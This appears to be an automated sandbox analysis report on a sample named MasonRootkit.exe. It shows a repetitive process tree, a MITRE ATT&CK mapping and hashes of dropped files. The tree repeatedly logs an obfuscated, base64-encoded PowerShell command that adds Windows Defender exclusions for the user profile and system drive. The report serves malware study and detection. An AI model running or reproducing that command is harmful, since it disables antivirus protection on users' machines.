        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        312⤵
        
        PID:4116
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        312⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        312⤵
        
        PID:7516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        313⤵
        
        PID:2640
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        313⤵
        
        PID:7356
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        313⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        314⤵
        
        PID:2236
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        314⤵
        
        PID:7196
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        314⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        315⤵
        
        PID:4148
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        315⤵
        
        PID:7844
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        315⤵
        
        PID:7888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        316⤵
        
        PID:6080
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        316⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        316⤵
        
        PID:964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        317⤵
        
        PID:1304
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        317⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        317⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        318⤵
        
        PID:4948
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        318⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        318⤵
        
        PID:1876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        319⤵
        
        PID:4640
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        319⤵
        
        PID:7916
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        319⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        320⤵
        
        PID:6224
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        320⤵
        
        PID:7368
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        320⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        321⤵
        
        PID:7872
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        321⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        321⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        322⤵
        
        PID:6800
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        322⤵
        
        PID:8076
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        322⤵
        
        PID:7596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        323⤵
        
        PID:4220
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        323⤵
        
        PID:6420
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        323⤵
        
        PID:3416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        324⤵
        
        PID:5720
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        324⤵
        
        PID:6028
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        324⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        325⤵
        
        PID:7588
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        325⤵
        
        PID:7848
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        325⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        326⤵
        
        PID:5244
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        326⤵
        
        PID:964
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        326⤵
        
        PID:5464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        327⤵
        
        PID:5708
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        327⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        327⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        328⤵
        
        PID:1916
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        328⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        328⤵
        
        PID:7476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        329⤵
        
        PID:8164
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        329⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        329⤵
        
        PID:7752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        330⤵
        
        PID:6808
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        330⤵
        
        PID:7684
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        330⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        331⤵
        
        PID:5560
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        331⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        331⤵
        
        PID:1428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        332⤵
        
        PID:5736
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        332⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        332⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        333⤵
        
        PID:7028
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        333⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        333⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        334⤵
        
        PID:412
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        334⤵
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        334⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        335⤵
        
        PID:6736
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        335⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        335⤵
        
        PID:920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        336⤵
        
        PID:7128
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        336⤵
        
        PID:6168

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{480a139f-bf40-40be-bc72-ce3f6bdbfd28}
1⤵
PID:5912

C:\Users\Admin\AppData\Roaming\Shell Infrastructure Host.exe
"C:\Users\Admin\AppData\Roaming\Shell Infrastructure Host.exe"
1⤵
PID:5560

C:\Users\Admin\AppData\Roaming\Shell Infrastructure Host.exe
"C:\Users\Admin\AppData\Roaming\Shell Infrastructure Host.exe"
1⤵
PID:4888

C:\Users\Admin\AppData\Roaming\Shell Infrastructure Host.exe
"C:\Users\Admin\AppData\Roaming\Shell Infrastructure Host.exe"
1⤵
PID:968

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4 0x378
1⤵
PID:1212

C:\Users\Admin\AppData\Roaming\Shell Infrastructure Host.exe
"C:\Users\Admin\AppData\Roaming\Shell Infrastructure Host.exe"
1⤵
PID:5776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\MasonRootkit.exe

Filesize
596KB

MD5
bb2fd6c1b233fd2f08a6a43ef860bcb6

SHA1
1cd9ea091bc0d7f907fcd8cf8c8b9d3187e6dc04

SHA256
8c4cddfb3723ecf013526733f93bd5f4408bc463c6a28ccb41b3fb63504ee9ce

SHA512
2ee649cf68e5121bd4ad3e51bdf0c71d773a8d0c67ce262356156b312221285bf62409ac2e2c5c5748adc31d3c94b24777f2918bdb9fcf488c61b0e2c6dc50b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MasonRootkit.exe.log

Filesize
1KB

MD5
3982d6d16fd43ae609fd495bb33433a2

SHA1
6c33cd681fdfd9a844a3128602455a768e348765

SHA256
9a0a58776494250224706cbfbb08562eec3891fb988f17d66d0d8f9af4253cf9

SHA512
4b69315f5d139b8978123bebd417231b28f86b6c1433eb88105465a342339c6c6b8c240a2ca8d2a9c1fca20136c8c167b78a770ab0664231f6e1742291cbf1aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Shell Infrastructure Host.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
